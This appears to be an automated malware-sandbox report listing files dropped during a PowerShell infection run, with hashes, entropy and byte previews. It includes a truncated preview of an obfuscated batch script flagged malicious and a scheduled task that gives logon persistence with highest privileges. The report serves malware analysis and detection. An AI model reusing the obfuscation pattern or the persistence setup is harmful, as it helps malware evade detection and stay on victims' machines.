SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mn0ho4un.to3.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u3xmlhmq.zg3.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vwdwgown.ooa.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\$nya-Logs\2024-10-03

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	432
Entropy (8bit):	7.480712887814053
Encrypted:	false
SSDEEP:	12:JVea+/UK733LgMgw2r3LB661/pvZiEVSZIwKmqnD3iJyc:vea+cqLhgLrNPhpyKzD3cyc
MD5:	BEEBE37780F9A6E06B953AE372CA93B8
SHA1:	19E136F3CEE67E233590DDE57E676204E01037C9
SHA-256:	39BDCB7198CB1E764660A9197B012EEE4C4D08D26CC77ECB07E64D062E7AA902
SHA-512:	462207F3B9869ABBD65F86D1F5D12FAE796C763DE1E65437767919F0CFFBF0935C2A610C5B09F9755C0B1F17F1E577E0263761E9E97449D315E16973B4B1FA33
Malicious:	false
Preview:	.8...)....8.T.......di....O.m.O.....NL..j#6M.=..,p.2Y......2.=.......9.. A...;......y.{.X.......K..H...I..5...t..O$f.oOqW.Z.Yj#.F...!W..=.,).(....; 6%..E.....\.......!..4-...$N...).H.T.../.W../.Y.t..].4.u...h. g.WJ...G.a.".]......7!Z...L.B....i......-..2.A..3-45..........t.g...~*.@@......1......M2d..U0..._.,.wh........M..'.U.7.#M.......... ..].d...B.q.Ig...O.....T....L...S.......V.....<V..?.^

C:\Windows\$rbx-onimai2\$rbx-CO2.bat

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	DOS batch file, ASCII text, with very long lines (5479), with CRLF line terminators
Category:	dropped
Size (bytes):	5285337
Entropy (8bit):	6.008970376557102
Encrypted:	false
SSDEEP:	49152:SW2HHBORwlR4IStoWhlWSPH4HCIhUm9wfE+0yd8aWacLhMrdOe8f8:9
MD5:	64D17CF4E56C0FDC93365EB17914CE39
SHA1:	4861BE8BA1BA6D567F9950390F290BB8B860CCAE
SHA-256:	7A83A44720D94BE24A8E7745D6871D65AFDA849C4008AB72511DD5AC38C7378C
SHA-512:	A905DE2FDC70937B91584F24358766599F733E7204578B60F64E47D523696D93B14B8AEE3B1E5822B6EB0602A248C326C6305D96375F4069F7462CBD1EC4C21C
Malicious:	true
Preview:	@echo off..%^%@%COIlBAlHvUDRWINcSFZvWKuWZahIRAnNuSvgrVABydeUMpExUFwUaHASuLlBtCPUHQwenHKXeyWSFAkKvJOmdsNMrCLFJZhVnjmWSAjmUzPCKHnUBBfJODRocJMLWenfqaFwnnRVzCrDDlbJpReiUyhJrYUjNyqQmKlJ%%^%e%QGoKjjlmoKRHdweaekSTVeotIhbmBrTZsHykPyLoWxdncBKclQhztQhMsUbbiZLXRRpvYUkGzDWxbaqhxYaLjtGBzLSUwJgWMgwlloeqFBaQTJLrEUEjZZNxlOVmcpjPw%%^%c%KVEfViUJfItPHQaBqCeXXMtZawtRoprktTZQMzYwopUeevhflBYHKzdXCEezPcvPriwNQkORDIIISoUEonGNqKATQbohuzGmTeNWYtpbNhebRufnKAkCwIyHICXPW%%^%h%wecvONBYFVYEajFycvWaxUoePlGgnwwAfgKaZvGrMLUpDRIpbkABSViCPXFDhvKjyxyTyFyGPFoMaZAYCqedWUHkYikcPdjqaKQgtPRvLTMmGwBPwHaRqHnEQoVpuvQLwXLpjuENzJrciuDBGvFidratxmpeTBaqcaQIKmGbcmrHplvvKtJZ%%^%o%IIeXsSXeATYIbZhEVQuOEfQatelQUtASbAusLLstJWCstYnloQPCoklDSeDnGhkgtfGBFPSjyafHDyGuQaBdDXDRoRzHheNCMvYosLGyYFeoeEauyjxGFgCwBPnNplctnDUhzscetdfXTpMKQfjYHgWGSCMCySjMDLaAJSUfgsnCaECmdCWjceLgHopWGAGATsuip%%^% %aYkdRpTuFnZzzVVZKzZTTvDYzGLMIHkuXRCYYYmvnmJbWgaKEUIUivrEumDlDgMXdFCHtXaLnDFHMCctFbiNZpmBAYDMvbShALYrDtrHTWHFPKSSkkFBYYXNsahutoqmLyhaDKPlKBTdIHMP%%^%o%KCkvqjBOl

C:\Windows\$rbx-onimai2\$rbx-CO2.bat:Zone.Identifier

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\System32\Tasks\$rbx-1ktMxXBv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	3488
Entropy (8bit):	3.5880169204751735
Encrypted:	false
SSDEEP:	48:yei1q97SQn1ab9o9V9Lvara+i3iusupRCRvA9ufAuRa7G5XhPsbN1jANg8iJXCc0:thnkp2Gdi3ipVA9ll7EhAMz3cHtr+
MD5:	A6B71EF585AB418697BC6AE8B5E12FDF
SHA1:	E835D2F837EFCFC58D8D373AF69F3BCC1C179710
SHA-256:	27C06B213153D0CA9735EBF96B0CCFF74B21541357E3036BD36DA863A56DE703
SHA-512:	7C0F37399790064EA638A11B1A3B9EBCFB9F7C7E76196734A3720D69618EFF7528ED3139E50FF3B4CAFF073EE10362F0E577BDBCDAA42962A02C8F97C872BDB7
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.D.a.t.e.>.2.0.2.4.-.1.0.-.0.3.T.0.9.:.1.4.:.4.9...0.1.8.-.0.4.:.0.0.<./.D.a.t.e.>..... . . . .<.U.R.I.>.\.$.r.b.x.-.1.k.t.M.x.X.B.v.<./.U.R.I.>..... . .<./.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.L.o.g.o.n.T.r.i.g.g.e.r.>..... . . . . . .<.E.n.a.b.l.e.d.>.t.r.u.e.<./.E.n.a.b.l.e.d.>..... . . . .<./.L.o.g.o.n.T.r.i.g.g.e.r.>..... . .<./.T.r.i.g.g.e.r.s.>..... . .<.P.r.i.n.c.i.p.a.l.s.>..... . . . .<.P.r.i.n.c.i.p.a.l. .i.d.=.".A.u.t.h.o.r.".>..... . . . . . .<.R.u.n.L.e.v.e.l.>.H.i.g.h.e.s.t.A.v.a.i.l.a.b.l.e.<./.R.u.n.L.e.v.e.l.>..... . . . . . .<.G.r.o.u.p.I.d.>.b.u.i.l.t.i.n.\.U.s.e.r.s.<./.G.r.o.u.p.I.d.>..... . . . .<./.P.r.i.n.c.i.p.a.l.>..... .

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Windows\System32\winevt\Logs\Application.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	68528
Entropy (8bit):	4.184084540779949
Encrypted:	false
SSDEEP:	768:W2WOUWFWH2WoOAskFAc1bVCP5rAKP5feZ7IHoDsMMcAa5:Wn/tkSchMPuKPBU
MD5:	9B223DDAC7D2FDC145ED88FAD996D67A
SHA1:	BA8146CBC636F011AF6EC768B475DB75474FCB07
SHA-256:	BA67377F7C72A9C194A1C9E2D477FA1928F89A2740DD6A81D098ABA05BF605C7
SHA-512:	4B1E29AF54D0C7ED2EC6507C8E197A37CE8A29BCEF27638C02CD29E0510E22E659FAF7DE84769A747BCD62D40D0A8E7471E2EA9921737030F7026DDB4476DB15
Malicious:	false
Preview:	ElfChnk.................[.......`...........x...P...\.......................................................................M+@.............$...............................=...........................................................................................$...............................m...............F...........................t...................M...c...........................p...................................&...................................................................................**......^.......,..x..............&.....................................................................................!...d.............,..x............^..............w.)Cp...................p.o.w.e.r.s.h.e.l.l...e.x.e...1.0...0...1.9.0.4.1...5.4.6...7.e.d.a.4.1.1.5...u.n.k.n.o.w.n...0...0...0...0...0.0.0.0.0.0.0.0...0.0.0.0.0.0.0.0...0.0.0.0.7.f.f.b.4.b.4.5.0.6.7.3...1.b.a.8...0.1.d.b.1.5.9.3.7.4.4.d.d.6.f.f...C.:.\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.W.i.n.d.o.w.s.P.o.w.e.r.S.h.e.l

C:\Windows\System32\winevt\Logs\Microsoft-Client-Licensing-Platform%4Admin.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.3165402716069035
Encrypted:	false
SSDEEP:	384:4he6UHi2uepX7xasnPC3FzFtpFDhFPFyF842v86:4VUHiapX7xadptrDT9W84H6
MD5:	79D43237E9541804231BDCEB0F029FAC
SHA1:	BDBEE2AF53978BA825F51F953782732DA615D233
SHA-256:	D2C5BF38BE0746E6284234B17C4FA1D2BDAAD8B0F459C71036A0B97D17FC6ACB
SHA-512:	DF8D9980E97EC3C1D06BE857891F1FF18CC016BBA5BB44186DD80DEEB067DCD51A27468348B40C423C8E5FF2E43EAE291D63CD72E4BA166A40F2A34A5584C6B7
Malicious:	false
Preview:	ElfChnk.........7...............7...........................................................................................!.&................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........r...................m..............qo...................>...;..................*..............4.9...............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppModel-Runtime%4Admin.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.377721629524822
Encrypted:	false
SSDEEP:	384:fhZN/GN6N/NDsNadNDtNkN6NQNQxNhdNQaNwNwNONPNavNqN6NfNjNALNCNyN7Ns:fZeIPRThtUmqYXL3QXr0Q7
MD5:	B59AFB7FCA4C7067FBB3EF413064809B
SHA1:	785A500AA8ADA1D59F3F7FD48E876F2305E7072D
SHA-256:	ED35583D239B8BBF565E20C872268401F9D05A4DCCE4ABA7F83BA99A5978FD95
SHA-512:	C86B8AE075AA4E669D9DE8EDC1C3E430D68F1A155153EE7B4C7B1898E03E42334C37FFAE7CD35B759EB019822762C7048083BEA711439FAA1D869360CE59CD88
Malicious:	false
Preview:	ElfChnk.{...............{..........................[.x......................................................................D.\........................................V...=...........................................................................................................................f...............?...........................m...................M...F...................=c......................=j...........................?......]...............................................-g..................**......{.......n=.df..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeployment%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.283865720656381
Encrypted:	false
SSDEEP:	384:/hMVnRVSV3V9VbVSV5VjVMV/V1VQVPTV0V6V6VoVbVaVVVlVlVmVTVwVgVAV1VKX:/+Hzi20Hl6Mun
MD5:	6012EC738D51AC5E524C7E14B6A28686
SHA1:	CF1638E2AFC42924B073BF15CFFB3186D904C055
SHA-256:	86670BCE95654015946369BCA383D26F6E90F25D9D2E5869BD82CC8943980A37
SHA-512:	CD782AFF747484F4637FC8C79D8E4C6FFC3BA421E4C100053CF6D199156F635C53EE69D3FFF497224AE6C1F2D426F7001FF4FE5FCF7A4D6C57444B67F08EB876
Malicious:	false
Preview:	ElfChnk......................................[..p]...%E^.....................................................................E:p................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................9@...............................=......**.. ..............f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.18944618600648
Encrypted:	false
SSDEEP:	384:Vhsmsmi7mRXZmVkWmhTimmdmBmKmPhmRTmimZ8mevmcsm7mrmQmzmjmvmTmmYmeX:V2klTiGFKX93WGUG+eOg26
MD5:	12609E48B04709E16124C9593D728702
SHA1:	60BC041C02B8E3CE4C557CA4C10CA988F2A9F26A
SHA-256:	D848412FE5650AE73672918D451F9FB46551FC4FEE22B460535377E6B23300FD
SHA-512:	90601C05EF8670C14E868A95D807CD4183E5C74E5E68619D446B3BFE101EFF5F44762681188F11CB65735E9D35B288C5AED10507818BAAE2D3C42E3FA48B3ADB
Malicious:	false
Preview:	ElfChnk.@-......o-......@-......o-..........(.......1..X.......................................................................................\...........................=...........................................................................................................................f...............?...........................m...................M...F................................i...&...,...........................7..................................5...c#..{1..k:...................v..........**..x...@-......U.hf..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.4560337854416335
Encrypted:	false
SSDEEP:	96:MaNVaO8sMa3Z85ZMLkm3Z85ZP3Z85ZxJz4rjjeM3Z85Zu:MMV7pp8nMLkmp8nPp8nbMv/p8n
MD5:	7C8AB6678FABF8B158E362756FE87E2B
SHA1:	4B9DC22D6916FA4FB943B746E5CF457B7F93B5A8
SHA-256:	E274BACC313944AD0BEB13500C4E7B4A93DE32C8896E550A44D6D1CB8CAB697C
SHA-512:	21A294D4E9AF901022E75D0A685354059C2DB3C9FDDB245F807635B4CB25009809DBFFC86AB0972CACC81CCFE9FF3CCE8AD3D9C5BF76487BB9DC5AAF2EA89896
Malicious:	false
Preview:	ElfChnk.....................................@...............................................................................Y.j.............................................=...........................................................................................................................f...............?...................................p...........M...F...............................................f...................................................................................&...............**..p...........n.d.............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.467947111655398
Encrypted:	false
SSDEEP:	1536:xZPZn2bBN2A4VD7VAx8whAGU2woJQghwMvOUFwe8OQhNwRA:
MD5:	6B473E7917B1EDEE80CAFE7D24A6A4E8
SHA1:	1940F41550F2986C928648ED00F9C6E4868D1A23
SHA-256:	1D52F13D2EA4ACC472815240DBFF0F34C6CD5E86F980D04D9AD28E42C3E7A355
SHA-512:	9AABAD5B7425A9692545864C11B99DDED0051CE8B442FFAB7BAB21DD8CD68B51BC980B01F324A81C685DC56793581AE2E6751DD08497CCBA64FB3339A9B5483D
Malicious:	false
Preview:	ElfChnk.e.......h.......e.......h...............x....;.......................................................................Z}............................................=...............y...........................................................................................................L...............?...............................................M...F...............................................&...................................................................................n...............**......e..........f..........'.z&........'.z..^................A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.565838744973026
Encrypted:	false
SSDEEP:	1536:PXY5nVYIyyqED5BVZUe39vHxt1BSocM1:PXY5nVYIyyqED5BVZUe39vHxt1BSot
MD5:	B30C931B9EF047307E1443502CE7EE14
SHA1:	BAC3632B709B853DFFCD9C4D65D1F9236F6FE551
SHA-256:	033CF49641F4E76EFABF8F25753074E7EE72DD567FBA4145D446032D3D9CFADB
SHA-512:	F5A9CA2D464EBA1F2F4EA426AC3864FB399A8951958BA44BA550E2129C4F4D4DA9E60F0D1B18A07CC76D4BC2CFD20D283F446A47DF990B52916113D5383A1952
Malicious:	false
Preview:	ElfChnk.........~...............~...................F..........................................................................T................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................N...............y.......................**................9..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-CodeIntegrity%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.436651632752671
Encrypted:	false
SSDEEP:	384:0hdo69CcoTorNorWorbvorTorZorQorNor7orqorlGhorXorWorxFo8ormor8orF:0DCFF
MD5:	5838F7481274DE6C603177C1A5C75477
SHA1:	525967B7CFD3883803916780F576995065FB9434
SHA-256:	545B8B8AE98E393520D453CE095CB4942BBAF575449ED11732E57298B9000A07
SHA-512:	590AAE46EE3E30A2DBD52F5FFE49ABA5789E80F0578FC1E073AEAA30DA1CAB43E30E3A6D814389692D39E95B727DD91AB8AD52858E56C9F6506AE4172544E743
Malicious:	false
Preview:	ElfChnk.........3...............3............z...}..?..D.....................................................................5.................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................3..................................=/....... ......U)..............................*...............k...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-BindFlt%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8511209646626153
Encrypted:	false
SSDEEP:	384:ChAiPA5PNPxPEPHPhPEPmPSPRP3PoPbPfP0bPnPdP:C2NZ
MD5:	A98C811B8E1B821CD1FE05A68ADD446A
SHA1:	4E8B739F5E308F943962E72FF24212FFBE47FAD7
SHA-256:	58F6584C100174B80ACB8940226841B77884326A293CEE9072F4DD4CF8C10133
SHA-512:	24A7B9C86A6CE93B9B7F4107A433A247789EE568EB69E301B51DC9D01AA40D2F408AD76B78F7F83E5F4EB47C1677276BC86F86A99BAB95186C2331ABE4CA523C
Malicious:	false
Preview:	ElfChnk......................................%...&..?........................................................................<.m................N...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&................................................................................ ..............'.......................**..x.............\|..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-Wcifs%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8431535491551847
Encrypted:	false
SSDEEP:	384:OhZ21JJgL4JJFiJJ+aeJJ+WBJJ+5vJJ+/UJJ+4fJJ+CwJJ+D2JJ+a2JJ+JtJJ+lk:OWXSYieD+tvgzmMvRQAsNi
MD5:	106F006ACA6287586EF71A10A5C06C4D
SHA1:	B4B6D91FF53E9BDFC8D0D99A0D6F643E49074932
SHA-256:	79E64A943AED80ADAE43934E4573F95AE7308DDD6FC896EEDDB386C8A41FBA65
SHA-512:	F4D49C8CBC2B46719521935DFABDC3E05883C2360D4E472920C420B1ACC74D0F835D10A2C5BA6E29038425809D585025172FDC9E534619C017D70FA4D9F23D53
Malicious:	false
Preview:	ElfChnk......................................$...&..{n.8.....................................................................{..................F...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................................................................................................**..p............zu..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.1699580099619564
Encrypted:	false
SSDEEP:	384:phqhSx4h/y4Rhph5h6hNh5hah/hrhbhmhjh/h7hkh8hbhMh9hYwhChwh8hRqh28W:pbCyhLfIIj7
MD5:	E6F79229DB689BB188915CF610A996AC
SHA1:	4AAECBC591855D7956746CF94E1E3A0038098A56
SHA-256:	DA8C32A3A138932F6B3389FBB9425116B99D8BB8C297DC7B56DFAA2E22F07ED8
SHA-512:	A1147FAEADBE2A34AB0912D6C3635A7E79C8DD9C38266C6814DDF1F26007EA15E7F55DF44F379C8583BE728F5E7C1E5C54E1AF031FD63458CDD36AB203B3A136
Malicious:	false
Preview:	ElfChnk.........M...............M........... ...h.....\......................................................................2.l................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................n................................................{......................................**..`............0H..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i